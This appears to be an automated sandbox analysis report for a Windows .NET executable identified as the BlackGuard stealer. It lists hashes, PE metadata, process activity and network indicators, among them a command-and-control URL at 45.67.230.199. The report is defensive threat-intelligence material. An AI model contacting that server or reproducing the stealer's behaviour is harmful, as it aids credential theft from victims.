Field | Value |
---|---|
File name: | gjnvlcxv.exe |
Full analysis: | https://app.any.run/tasks/f2733975-cedb-4d18-a0e1-20ff9b8d653b |
Verdict: | Malicious activity |
Analysis date: | April 01, 2023, 19:22:55 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-dosexec |
File info: | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows |
MD5: | 3ABACDBDDB7190C93D7F24561B201B48 |
SHA1: | 751507B13DA515C2FC06E556EB7D5CA16BC54CD0 |
SHA256: | 72779E29EB9099678AF9B0DAA7E376322A0C8FD2C9ACE68962249ED72930D9D2 |
SSDEEP: | 49152:DX0T+Sk6BU7HIFd7+JJ1glw+W7SCFHT9kly8Pv6Uc:DX0T+Srpzmg2rz38X6Uc |
Extension | Identified type (%) |
---|---|
.exe | Generic CIL Executable (.NET, Mono, etc.) (63.1) |
.exe | Win64 Executable (generic) (23.8) |
.dll | Win32 Dynamic Link Library (generic) (5.6) |
.exe | Win32 Executable (generic) (3.8) |
.exe | Generic Win/DOS Executable (1.7) |
Field | Value |
---|---|
AssemblyVersion: | 1.0.0.0 |
ProductVersion: | 1.0.0.0 |
ProductName: | - |
OriginalFileName: | fogilcxv.exe |
LegalTrademarks: | gdwhgeral |
LegalCopyright: | - |
InternalName: | fogilcxv.exe |
FileVersion: | 1.0.0.0 |
FileDescription: | tanos |
CompanyName: | - |
Comments: | fdgert opopchie |
CharacterSet: | Unicode |
LanguageCode: | Neutral |
FileSubtype: | - |
ObjectFileType: | Executable application |
FileOS: | Win32 |
FileFlags: | (none) |
FileFlagsMask: | 0x003f |
ProductVersionNumber: | 1.0.0.0 |
FileVersionNumber: | 1.0.0.0 |
Subsystem: | Windows GUI |
SubsystemVersion: | 6 |
ImageVersion: | - |
OSVersion: | 4 |
EntryPoint: | 0x22112e |
UninitializedDataSize: | - |
InitializedDataSize: | 182272 |
CodeSize: | 2224640 |
LinkerVersion: | 48 |
PEType: | PE32 |
ImageFileCharacteristics: | Executable, Large address aware, 32-bit |
TimeStamp: | 2068:11:08 00:30:45+00:00 |
MachineType: | Intel 386 or later, and compatibles |
Field | Value |
---|---|
Architecture: | IMAGE_FILE_MACHINE_I386 |
Subsystem: | IMAGE_SUBSYSTEM_WINDOWS_GUI |
Compilation Date: | 08-Nov-2068 00:30:45 |
Comments: | fdgert opopchie |
CompanyName: | - |
FileDescription: | tanos |
FileVersion: | 1.0.0.0 |
InternalName: | fogilcxv.exe |
LegalCopyright: | - |
LegalTrademarks: | gdwhgeral |
OriginalFilename: | fogilcxv.exe |
ProductName: | - |
ProductVersion: | 1.0.0.0 |
Assembly Version: | 1.0.0.0 |
Field | Value |
---|---|
Magic number: | MZ |
Bytes on last page of file: | 0x0090 |
Pages in file: | 0x0003 |
Relocations: | 0x0000 |
Size of header: | 0x0004 |
Min extra paragraphs: | 0x0000 |
Max extra paragraphs: | 0xFFFF |
Initial SS value: | 0x0000 |
Initial SP value: | 0x00B8 |
Checksum: | 0x0000 |
Initial IP value: | 0x0000 |
Initial CS value: | 0x0000 |
Overlay number: | 0x0000 |
OEM identifier: | 0x0000 |
OEM information: | 0x0000 |
Address of NE header: | 0x00000080 |
Field | Value |
---|---|
Signature: | PE |
Machine: | IMAGE_FILE_MACHINE_I386 |
Number of sections: | 3 |
Time date stamp: | 08-Nov-2068 00:30:45 |
Pointer to Symbol Table: | 0x00000000 |
Number of symbols: | 0 |
Size of Optional Header: | 0x00E0 |
Characteristics: | |
Name | Virtual Address | Virtual Size | Raw Size | Characteristics | Entropy |
---|---|---|---|---|---|
.text | 0x00002000 | 0x0021F134 | 0x0021F200 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 7.95157 |
.rsrc | 0x00222000 | 0x0002C57C | 0x0002C600 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 5.34164 |
.reloc | 0x00250000 | 0x0000000C | 0x00000200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ | 0.10191 |
Title | Entropy | Size | Codepage | Language | Type |
---|---|---|---|---|---|
1 | 5.00112 | 490 | UNKNOWN | UNKNOWN | RT_MANIFEST |
2 | 4.43469 | 67624 | UNKNOWN | UNKNOWN | RT_ICON |
3 | 4.78561 | 38056 | UNKNOWN | UNKNOWN | RT_ICON |
4 | 4.76922 | 21640 | UNKNOWN | UNKNOWN | RT_ICON |
5 | 4.66089 | 16936 | UNKNOWN | UNKNOWN | RT_ICON |
6 | 4.98162 | 9640 | UNKNOWN | UNKNOWN | RT_ICON |
7 | 5.05077 | 4264 | UNKNOWN | UNKNOWN | RT_ICON |
8 | 5.34627 | 2440 | UNKNOWN | UNKNOWN | RT_ICON |
9 | 5.41874 | 1128 | UNKNOWN | UNKNOWN | RT_ICON |
32512 | 3.03466 | 132 | UNKNOWN | UNKNOWN | RT_GROUP_ICON |
Imports: mscoree.dll
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2824 | "C:\Users\admin\AppData\Local\Temp\gjnvlcxv.exe" | C:\Users\admin\AppData\Local\Temp\gjnvlcxv.exe | | explorer.exe |

Details: User: admin; Integrity Level: MEDIUM; Description: tanos; Exit code: 3762504530; Version: 1.0.0.0
BlackGuard, (PID) Process: (2824) gjnvlcxv.exe. Strings: 590. C2 (1): http://45.67.230.199
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3864 | "C:\Windows\system32\verclsid.exe" /S /C {0B2C9183-C9FA-4C53-AE21-C900B0C39965} /I {0C733A8A-2A1C-11CE-ADE5-00AA0044773D} /X 0x401 | C:\Windows\System32\verclsid.exe | — | explorer.exe |

Details: User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Extension CLSID Verification Host; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
(PID) Process | Key | Operation | Name | Value |
---|---|---|---|---|
(2824) gjnvlcxv.exe | HKEY_CLASSES_ROOT\Local Settings\MuiCache\16D\52C64B7E | write | LanguageList | en-US |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2824 | gjnvlcxv.exe | GET | — | 45.67.230.199:80 | http://45.67.230.199/Upgrade.php | unknown | — | — | suspicious |
2824 | gjnvlcxv.exe | GET | — | 45.67.230.199:80 | http://45.67.230.199/Upgrade.php | unknown | — | — | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2824 | gjnvlcxv.exe | 45.67.230.199:80 | — | Webhost LLC | RU | suspicious |
2824 | gjnvlcxv.exe | 195.201.57.90:443 | ipwhois.app | Hetzner Online GmbH | DE | suspicious |
Domain | IP | Reputation |
---|---|---|
ipwhois.app | 195.201.57.90 | suspicious |